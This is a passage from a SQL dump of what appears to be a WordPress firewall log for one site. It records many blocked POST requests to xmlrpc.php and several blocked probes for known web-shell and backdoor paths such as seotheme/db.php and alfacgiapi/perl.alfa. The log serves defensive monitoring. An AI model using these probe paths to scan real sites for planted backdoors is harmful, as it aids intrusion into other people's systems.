Safari\\/537.36\"}','XlHeIZhtDb7mL01kiVFRTBAG',0,1680789092.5577,665,'','POST',403,0,515,0,1,'',0),('91.219.122.50',1541110322,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','XMvDSd3lViLnracTwe6FHWR1',0,1680789100.3867,556,'','POST',403,0,515,0,1,'',0),('194.59.206.66',3258699330,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','RInvbU7k0XzhKAdxaZqTGsBg',0,1680789103.0367,938,'','POST',403,0,515,0,1,'',0),('101.50.2.67',1697776195,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','QkoiJW3acrKUjZtFs91BSyl7',0,1680789105.6184,629,'','POST',403,0,515,0,1,'',0),('182.92.129.110',3059515758,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','CydtbJNLlv7F3qunkMzRaW04',0,1680789113.9604,1486,'','POST',403,0,515,0,1,'',0),('54.38.242.51',908522035,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','ANGO8kaHZTr7SmiQDn2tUp3F',0,1680789114.3619,1621,'','POST',403,0,515,0,1,'',0),('91.204.46.91',1540107867,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','pOMCXA6PYm94wicUgorbR1Wa',0,1680789115.4589,987,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','dHiIMycR6YaDZutrjs4AgqX5',0,1680792452.6276,2860,'','POST',403,0,515,0,1,'',0),('143.42.194.250',2401944314,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','RQptFTZCc3VjGMPxb50eK7AB',0,1680792457.7697,607,'','POST',403,0,515,0,1,'',0),('139.59.62.4',2335915524,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','FNVEQjYeMPkWyfJ9h8bO0pAt',0,1680792472.6372,558,'','POST',403,0,515,0,1,'',0),('198.71.235.60',3326602044,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','2c7iVgYlMpJA6hEkf1P3nQxR',0,1680792476.2530,737,'','POST',403,0,515,0,1,'',0),('51.144.123.73',865106761,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','QVi6pJ0qLPTRIWAvakcugBZf',0,1680792478.5747,588,'','POST',403,0,515,0,1,'',0),('67.23.226.46',1125638702,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','LXjGrQUlSsmbain6t1dAFC28',0,1680792486.5537,697,'','POST',403,0,515,0,1,'',0),('34.95.136.51',576686131,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','iI3ruQnkfY96wF0BJov5sljx',0,1680792488.4118,781,'','POST',403,0,515,0,1,'',0),('51.144.123.73',865106761,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','kFK4rHztpeA9IXxDbaiYjUdN',0,1680792491.4270,1381,'','POST',403,0,515,0,1,'',0),('47.88.33.72',794304840,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','Z3uObFSGrRxaVh8X1Bgd02mI',0,1680793303.5293,1759,'','POST',403,0,515,0,1,'',0),('199.241.139.132',3354495876,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','tFRGhivnl79PzaqsjmBeU5fV',0,1680793301.9030,3740,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','i6bfYO1Z4n9VTQkINqox3X7l',0,1680793315.3032,578,'','POST',403,0,515,0,1,'',0),('45.77.175.167',760065959,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','1SZIvoAzEKtmJPk3cDXygxQl',0,1680793318.4544,567,'','POST',403,0,515,0,1,'',0),('173.212.199.147',2916403091,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','yXC4neGxszMuFOjr2i8NY7q3',0,1680793325.3205,600,'','POST',403,0,515,0,1,'',0),('103.3.1.158',1728250270,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','vQktzRdu6APyxUfqsKh38MpO',0,1680793332.0137,700,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','DWp9w50yPYJUge4LRNEoISZl',0,1680793334.2305,623,'','POST',403,0,515,0,1,'',0),('201.149.91.174',3382008750,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','qVRi9tQrCoEMsKYAb2jzeymI',0,1680793341.7822,632,'','POST',403,0,515,0,1,'',0),('103.255.237.9',1744825609,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','e75WR46lNpJQkIEnfKu9i1ZC',0,1680793348.3731,596,'','POST',403,0,515,0,1,'',0),('45.130.229.130',763553154,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','O0A1h83XeJz4cGHoduW5isZB',0,1680793355.2278,624,'','POST',403,0,515,0,1,'',0),('45.162.228.171',765650091,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','QbOAGtflZm5r6zXheR3NLvU7',0,1680793609.6636,2883,'','POST',403,0,515,0,1,'',0),('103.254.153.99',1744738659,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','CSsR7dxOHAE4TFWQwcGfzVr0',0,1680794629.0933,1333,'','POST',403,0,515,0,1,'',0),('185.200.116.211',3116922067,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','gkC31rmcx4QIHVJbDPUA7uXa',0,1680795815.2424,701,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','TO5adz2LIPUgN6pQreV9WqlS',0,1680797303.0599,3590,'','POST',403,0,515,0,1,'',0),('159.223.93.124',2682215804,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','5IBn9ZtCvdmGJ7gpDYuzcVQU',0,1680797302.1307,4519,'','POST',403,0,515,0,1,'',0),('148.66.147.20',2487390996,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','Iys40wbMO6jLKAPR5uEeS3ag',0,1680797312.9086,552,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','tBUOYAQzMXJxmC7I0GR3Hg4Z',0,1680797315.1570,568,'','POST',403,0,515,0,1,'',0),('163.172.60.103',2745973863,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','a6VQk7UAdpe5qbDHvOr2uNmc',0,1680797317.9896,1264,'','POST',403,0,515,0,1,'',0),('65.20.75.229',1091849189,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','sVjhHczTriSAa0ldmnoQb3Uv',0,1680797318.2850,1192,'','POST',403,0,515,0,1,'',0),('72.167.69.17',1218921745,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','nlw4EQqgUZsctTVhOF8rx9YA',0,1680797322.8339,547,'','POST',403,0,515,0,1,'',0),('46.105.97.186',778658234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','1GYUxKZMWACi6tNP7R5SrJOX',0,1680797324.4138,574,'','POST',403,0,515,0,1,'',0),('140.174.6.37',2360215077,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','EReU3DGwFiTqSY8r4OagBloL',0,1680797330.5342,602,'','POST',403,0,515,0,1,'',0),('68.178.145.187',1152553403,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','FT8jiR6G3rMdOnDNeS4VakCy',0,1680797340.6069,576,'','POST',403,0,515,0,1,'',0),('91.204.46.91',1540107867,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','2n7UwufDq3FYAVEbzR0eTSJ9',0,1680797655.2509,1723,'','POST',403,0,515,0,1,'',0),('130.69.94.131',2185584259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','AfsrvDZ2XBiG8UEVT1Nwjqdm',0,1680797662.2058,598,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','cPQ4idpgq1EBUDkuh9r2FntR',0,1680797663.9615,623,'','POST',403,0,515,0,1,'',0),('130.69.94.131',2185584259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','YUfFaVkMr8BZSj1iWtqDmNnb',0,1680797670.6616,538,'','POST',403,0,515,0,1,'',0),('199.241.137.45',3354495277,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','t8v6WgDI2Rzq3Fc4SdMswKTU',0,1680797676.7589,553,'','POST',403,0,515,0,1,'',0),('173.231.231.50',2917656370,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','yfv2QOqpPat0F639bxsNiuIG',0,1680797682.3718,986,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','hM4ywfzFi8ukveHU32YdtDKL',0,1680797682.8849,1000,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','c2U9N3hw0IFWHX6bOmlny5pa',0,1680797695.1895,1310,'','POST',403,0,515,0,1,'',0),('185.151.196.183',3113731255,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','0FJ8g62Enmy5eMuWjLCcoSZH',0,1680797699.9190,535,'','POST',403,0,515,0,1,'',0),('62.102.148.166',1046910118,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','cwvSxeTlUQtIuVmdks1LjFRo',0,1680798285.9636,3584,'','POST',403,0,515,0,1,'',0),('20.40.54.253',338179837,'','http://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','cuonVe3T17QN4zHxRKvg9bdt',0,1680800500.5544,1598,'','GET',403,0,700,0,1,'',0),('20.40.54.253',338179837,'','https://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','3ILaXc1ZAksnfHdURuQGC5El',0,1680800503.5191,1553,'','GET',403,0,700,0,1,'',0),('20.40.54.253',338179837,'','https://cmdev-site1.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','0GOBm1gJAVkezxHX5rb29uLM',0,1680800503.4832,1595,'','POST',403,0,700,0,1,'',0),('20.40.54.253',338179837,'','http://cmdev-site1.com/alfacgiapi/perl.alfa','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','qzObZS2NFdYjg5LyJnpacGh4',0,1680800505.6744,775,'','POST',403,0,700,0,1,'',0),('20.40.54.253',338179837,'','http://cmdev-site1.com/wp-content/plugins/apikey/apikey.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','tihjTN5yYZpdEImuVL9KrRka',0,1680800507.3919,359,'','GET',403,0,700,0,1,'',0),('20.40.54.253',338179837,'','http://cmdev-site1.com/plugins/content/apismtp/apismtp.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','ikplzLZwuUy4oCNWPj0dY7TV',0,1680800508.1690,297,'','GET',403,0,700,0,1,'',0),('20.40.54.253',338179837,'','http://cmdev-site1.com/wp-content/plugins/apikey/apikey.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','isIZKFk3cQeS2AUVqN7aLbjp',0,1680800508.8721,393,'','GET',403,0,700,0,1,'',0),('20.40.54.253',338179837,'','http://cmdev-site1.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','7lz3pYFmgwVPRKyiTCfSkHAo',0,1680800509.6964,379,'','GET',403,0,700,0,1,'',0),('68.235.48.108',1156264044,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','60JCR4gkzecKMbHStdhvY9Fj',0,1680801283.9599,2215,'','POST',403,0,515,0,1,'',0),('184.75.221.203',3091979723,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','mQXthgOx0jML5HC7bs4ye1fk',0,1680802102.5641,1178,'','POST',403,0,515,0,1,'',0),('209.236.124.38',3521936422,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','r7psUxq4GyWokMH8vm0PcBh6',0,1680802801.6239,1996,'','POST',403,0,515,0,1,'',0),('103.9.227.178',1728701362,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','b4x8jGh576t3nlSEmscJKQBL',0,1680802809.7892,1360,'','POST',403,0,515,0,1,'',0),('140.174.6.37',2360215077,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','Kik1WAdrgBYlbCDQ4sXvhj5Z',0,1680802810.3008,1128,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','r0CIdw1oByAGTM96ljOvkbXU',0,1680802818.1328,598,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','pfX9kumR46C87WFKonhM3UeV',0,1680802822.3401,621,'','POST',403,0,515,0,1,'',0),('103.9.227.178',1728701362,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','oLgSdRZfDTaXx4UOsehQIGF9',0,1680802825.4006,615,'','POST',403,0,515,0,1,'',0),('128.199.90.99',2160548451,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','S7aoNBUZfTm2HxweI53XCWhV',0,1680802828.8630,1308,'','POST',403,0,515,0,1,'',0),('68.178.145.187',1152553403,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','kFhSCb9Ipro6Ws7P3Y1TUN2B',0,1680802828.9679,1331,'','POST',403,0,515,0,1,'',0),('72.167.69.17',1218921745,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','mW531NupABQgDe4w0iFPHCGS',0,1680802832.8136,2722,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','Md1gwz7bh60lcCavuGfAijUs',0,1680802839.7519,687,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','tIuGL1YDWFmUhEqbj8fPBRcN',0,1680802842.0723,629,'','POST',403,0,515,0,1,'',0),('86.105.9.67',1449724227,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','82ArYNILB47gn0oduQZDPmkz',0,1680803643.2121,894,'','POST',403,0,515,0,1,'',0),('173.212.199.147',2916403091,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','83jmT9z0NaF6PMpJC5AVghri',0,1680805156.5576,2972,'','POST',403,0,515,0,1,'',0),('137.184.211.244',2310591476,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','5ygqWwhrcuItCaTdRjiZHNL8',0,1680805156.9294,2599,'','POST',403,0,515,0,1,'',0),('101.50.2.67',1697776195,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','cJtPV0fZLjIx5NeC3SR1pQXT',0,1680805160.4323,564,'','POST',403,0,515,0,1,'',0),('178.162.204.238',2997013742,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','kcyfAldQe4pwaGT3mFIRKXgx',0,1680805330.3793,616,'','POST',403,0,515,0,1,'',0),('31.170.22.49',531240497,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','P3UA0hiflmFwuNDR5QTCSj9V',0,1680806017.2769,998,'','POST',403,0,515,0,1,'',0),('31.170.22.49',531240497,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','z5RjsQtq0k3prNB7Z1MDdEew',0,1680806027.6499,565,'','POST',403,0,515,0,1,'',0),('103.124.94.44',1736203820,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','1GsWg2fuDEy93XxhTSLoVKNp',0,1680806031.0511,1689,'','POST',403,0,515,0,1,'',0),('137.184.211.244',2310591476,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','Z2Bltp8r9gW5Q4UsvPY0u7Gf',0,1680806031.2542,1809,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','Z8u7rxlzaUNSI1bpV6BHKFRJ',0,1680806041.3644,1313,'','POST',403,0,515,0,1,'',0),('139.162.104.127',2342676607,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','jLsFcf5w3xA7OBpQReuVXoyI',0,1680806041.5844,1303,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 